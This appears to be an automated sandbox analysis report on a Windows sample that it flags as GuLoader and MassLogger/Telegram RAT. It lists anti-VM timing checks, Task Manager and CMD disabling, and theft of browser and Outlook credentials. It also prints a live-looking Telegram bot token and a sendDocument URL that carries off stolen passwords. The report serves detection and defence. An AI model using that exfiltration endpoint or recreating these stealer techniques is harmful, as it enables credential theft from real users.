Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: WGi85dsMNp.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2180305657.0000000003349000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Code function: 0_2_6F941B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6F941B5F

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

File created: C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	API/Special instruction interceptor: Address: 3A436CE
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	API/Special instruction interceptor: Address: 1EE36CE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	RDTSC instruction interceptor: First address: 3A0B40B second address: 3A0B40B instructions: 0x00000000 rdtsc 0x00000002 cmp cx, 77B0h 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FED40D50FEDh 0x0000000b test eax, 0AF5C948h 0x00000010 inc ebp 0x00000011 test dx, bx 0x00000014 inc ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	RDTSC instruction interceptor: First address: 1EAB40B second address: 1EAB40B instructions: 0x00000000 rdtsc 0x00000002 cmp cx, 77B0h 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FED40C5437Dh 0x0000000b test eax, 0AF5C948h 0x00000010 inc ebp 0x00000011 test dx, bx 0x00000014 inc ebx 0x00000015 rdtsc

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Memory allocated: 120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Memory allocated: 32CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Memory allocated: 32BD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

API coverage: 3.4 %

Source: C:\Users\user\Desktop\WGi85dsMNp.exe TID: 6720	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe TID: 6720	Thread sleep time: -600000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 0_2_0040672B FindFirstFileW,FindClose,	0_2_0040672B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AFA
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_00402868 FindFirstFileW,	2_2_00402868
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_0040672B FindFirstFileW,FindClose,	2_2_0040672B
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Code function: 2_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405AFA

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Thread delayed: delay time: 600000			Jump to behavior

Source: WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026ED000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026BE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	API call chain: ExitProcess graph end node			graph_0-4590
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	API call chain: ExitProcess graph end node			graph_0-4746

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Code function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,

0_2_00401E49

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Code function: 0_2_6F941B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6F941B5F

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Process created: C:\Users\user\Desktop\WGi85dsMNp.exe "C:\Users\user\Desktop\WGi85dsMNp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Queries volume information: C:\Users\user\Desktop\WGi85dsMNp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034A5

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables CMD prompt

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Registry value created: DisableCMD 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\WGi85dsMNp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\WGi85dsMNp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\WGi85dsMNp.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WGi85dsMNp.exe PID: 1476, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	31 Disable or Modify Tools	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
WGi85dsMNp.exe	76%	Virustotal		Browse
WGi85dsMNp.exe	61%	ReversingLabs	Win32.Trojan.Guloader
WGi85dsMNp.exe	100%	Avira	HEUR/AGEN.1337946

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll	0%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.78	true	false	high
drive.usercontent.google.com	172.217.16.193	true	false	high
reallyfreegeoip.org	104.21.16.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.google.com	WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032E1B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	WGi85dsMNp.exe, 00000002.00000003.2228492908.000000000270D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/	WGi85dsMNp.exe, 00000002.00000002.3921677511.0000000002698000.00000004.00000020.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3921677511.00000000026BE000.00000004.00000020.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D61000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032D3F000.00000004.00000800.00020000.00000000.sdmp	false	high
